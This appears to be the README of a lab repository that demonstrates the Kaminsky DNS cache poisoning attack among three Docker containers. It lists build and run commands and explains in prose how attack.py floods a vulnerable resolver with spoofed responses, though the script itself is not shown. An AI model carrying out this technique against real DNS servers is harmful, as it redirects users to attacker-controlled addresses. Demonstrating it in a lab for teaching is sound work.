The purpose of this repository is to showcase the famous Kaminsky Attack which enables a remote hacker to poison the cache of a vulnerable DNS server remotely to redirect users to malicious IP addresses.
We have 3 entities participating in the attack:
Alice (10.0.0.2): The unsuspecting user who will query the poisoned DNS server
Mallory (10.0.0.3): The remote hacker who poisons the DNS server
Server (10.0.0.4): The vulnerable DNS server
In order to build the project, run the following commands:
- Build the images
docker-compose build
- Create the containers
docker-compose up
- Go into Mallory
docker exec -it mallory bash - Run the following command
python3 /shared/mallory/attack.py
- Let the attack run and restart Mallory after some time
- If Alice tries to query
sec-commerce.seclab.spaceshe'll get Mallory's IP
Essentially what attack.py does is create 10 processes, each of which queries the DNS server to trigger the recursive resolution of the fake hostname and sends 50 fake response packets every few milliseconds. The intention is that the DNS server accepts one of these fake response packets and caches the result so that when Alice tries to query the same hostname, she'll get redirected to the spoofed address.